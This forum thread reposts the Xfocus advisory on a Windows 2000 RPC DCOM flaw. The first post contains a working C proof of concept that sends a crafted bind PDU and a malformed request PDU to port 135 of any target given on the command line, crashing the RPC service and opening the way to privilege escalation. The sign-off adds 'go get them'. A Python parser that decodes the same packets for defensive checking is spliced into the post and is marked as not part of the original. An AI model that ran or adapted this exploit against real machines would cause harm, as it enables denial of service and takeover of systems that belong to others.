Win2k (privilege escalation)

#1 (Advanced member, joined Dec 2001, location BCN, 469 posts)
I found an interesting page that warns of a major Win2k vulnerability that can allow total control of the machine. The news in English is:

Microsoft Windows 2000 RPC DCOM Interface DOS AND Privilege Escalation Vulnerability

Create: 2003-07-25
Author: flashsky (flashsky1_at_sina.com)

1. Description:
There is a vulnerability in the part of RPC that deals with message exchange over TCP/IP. The failure results from incorrect handling of malformed messages.
By sending malformed messages to the DCOM __RemoteGetClassObject interface, the RPC service will crash, and all services and applications depending on the RPC service will behave abnormally.
If an attacker has an account, he can hijack the epmapper pipe and port 135 for privilege escalation after the RPC service has crashed.

2. Affected Systems:
Windows 2000 +SP3
Windows 2000 +SP4+

3. Proof of concept codes:


#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#include <process.h>
#include <string.h>
#include <winbase.h>

/* DCE/RPC bind PDU, 72 bytes: binds presentation context 1 to the
   interface UUID 000001A0-0000-0000-C000-000000000046 (the DCOM
   interface the advisory refers to) using the standard NDR transfer
   syntax 8A885D04-1CEB-11C9-9FE8-08002B104860. */
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

/* DCE/RPC request PDU, 72 bytes: call_id 0x13, context 1, opnum 3,
   followed by the malformed stub data that triggers the crash. */
unsigned char request[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};

int main(int argc,char ** argv)
{
    WSADATA WSAData;
    int i;
    SOCKET sock;
    SOCKADDR_IN addr_in;
    short port=135;
    unsigned char buf1[0x1000];

    printf("RPC DCOM DOS Vulnerability discovered by Xfocus.org\n");
    printf("Code by FlashSky,[email protected],benjurry,benjurry@xfocus.org\n");
    printf("Welcome to http://www.xfocus.net\n");
    if(argc<2)
    {
        printf("usage:%s target\n",argv[0]);
        exit(1);
    }

    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    {
        printf("WSAStartup error.Error:%d\n",WSAGetLastError());
        return 1;
    }

    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(port);
    addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);

    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
        printf("Socket failed.Error:%d\n",WSAGetLastError());
        return 1;
    }
    if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
    {
        printf("Connect failed.Error:%d\n",WSAGetLastError());
        return 1;
    }
    /* Send the bind, peek at the bind_ack, then send the request. */
    if (send(sock,(char *)bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
    {
        printf("Send failed.Error:%d\n",WSAGetLastError());
        return 1;
    }

    i=recv(sock,(char *)buf1,1024,MSG_PEEK);
    if (send(sock,(char *)request,sizeof(request),0)==SOCKET_ERROR)
    {
        printf("Send failed.Error:%d\n",WSAGetLastError());
        return 1;
    }
    i=recv(sock,(char *)buf1,1024,MSG_PEEK);
    closesocket(sock);
    WSACleanup();
    return 0;
}
5. About XFOCUS.ORG
Xfocus is a non-profit and free technology organization which was founded in 1998 in China. We are devoted to research and demonstration of weaknesses related to network services and communication security.
We hope that we can use new technical tools to achieve our goal, and to broaden our outlook. We also hope we can communicate and help each other through this amazing Internet.
This site is created for publishing some documents, codes and utilities of our research work. Any suggestions are welcome, please contact us at webmaster_at_xfocus.org.
From the Internet. For the Internet. Have fun!


Don't be too evil. And go get them, there are few of them!!!
Resistance is futile, you will all be assimilated.
NeoGenessis
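Decoding the two PDUs quoted above, as an added defender-side example that is not part of the original post or the Xfocus code: a small parser for the connection-oriented DCE/RPC header and the bind and request bodies, which reports the interface UUID and opnum and flags header fields that disagree with the bytes actually received (the kind of consistency check an RPC endpoint or an IDS should make before trusting a message). It uses only the Python standard library; the byte strings are the ones from the post.

```python
import struct
import uuid

# The two PDUs from the quoted proof of concept (bind, then request), as hex.
BIND = bytes.fromhex(
    "05000b0310000000480000007f000000" "d016d016000000000100000001000100"
    "a001000000000000c000000000000046" "00000000045d888aeb1cc9119fe80800"
    "2b10486002000000")
REQUEST = bytes.fromhex(
    "05000003100000004800000013000000" "90000000010003000500060100000000"
    + "31" * 32 + "00" * 8)

# 16-byte common header: version, minor, ptype, pfc_flags, drep[4], frag_length, auth_length, call_id
HEADER = struct.Struct("<BBBB4sHHI")
PTYPE = {0: "request", 2: "response", 3: "fault", 11: "bind", 12: "bind_ack", 13: "bind_nak"}

def parse_pdu(pdu: bytes) -> dict:
    """Decode one connection-oriented DCE/RPC PDU and list header/body inconsistencies."""
    if len(pdu) < HEADER.size:
        raise ValueError("truncated DCE/RPC header")
    vers, minor, ptype, flags, drep, frag_len, auth_len, call_id = HEADER.unpack_from(pdu)
    if vers != 5 or (drep[0] & 0xF0) != 0x10:
        raise ValueError("not a little-endian DCE/RPC v5 PDU")
    info = {"ptype": PTYPE.get(ptype, ptype), "flags": flags, "call_id": call_id,
            "frag_len": frag_len, "issues": []}
    if frag_len != len(pdu):  # the header's own length claim must match what arrived
        info["issues"].append("frag_length %d != bytes on the wire %d" % (frag_len, len(pdu)))
    body = pdu[HEADER.size:frag_len]
    if ptype == 11:  # bind: negotiation fields, then the first presentation context
        max_xmit, max_recv, assoc_group, n_ctx = struct.unpack_from("<HHIB", body, 0)
        ctx_id, n_ts = struct.unpack_from("<HB", body, 12)
        info.update(max_xmit=max_xmit, n_ctx=n_ctx, ctx_id=ctx_id,
                    abstract_syntax=str(uuid.UUID(bytes_le=body[16:32])),
                    abstract_version=struct.unpack_from("<HH", body, 32),
                    transfer_syntax=str(uuid.UUID(bytes_le=body[36:52])))
    elif ptype == 0:  # request: alloc_hint, context id, opnum, then NDR stub data
        alloc_hint, ctx_id, opnum = struct.unpack_from("<IHH", body, 0)
        stub = body[24 if flags & 0x80 else 8:]  # PFC_OBJECT_UUID adds a 16-byte object UUID
        info.update(alloc_hint=alloc_hint, ctx_id=ctx_id, opnum=opnum, stub_len=len(stub))
        if alloc_hint > len(stub):  # a hint larger than the data present is a red flag
            info["issues"].append("alloc_hint %d exceeds stub data length %d" % (alloc_hint, len(stub)))
    return info

if __name__ == "__main__":
    for pdu in (BIND, REQUEST):
        print(parse_pdu(pdu))
```

The request PDU from the post advertises an alloc_hint of 144 bytes while carrying only 48 bytes of stub data, which is exactly the kind of self-inconsistent message a hardened parser should reject before decoding the stub.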
     

#2 (Intermediate member, joined Jul 2003, location Riverdel, 56 posts)
I haven't studied the code, but it seems that what you're doing is accessing one of the services on the TCP or UDP ports with sockets, although on the other hand it seems to be meant to run directly on the local machine.
The comments could at least have been in the language of Cervantes.
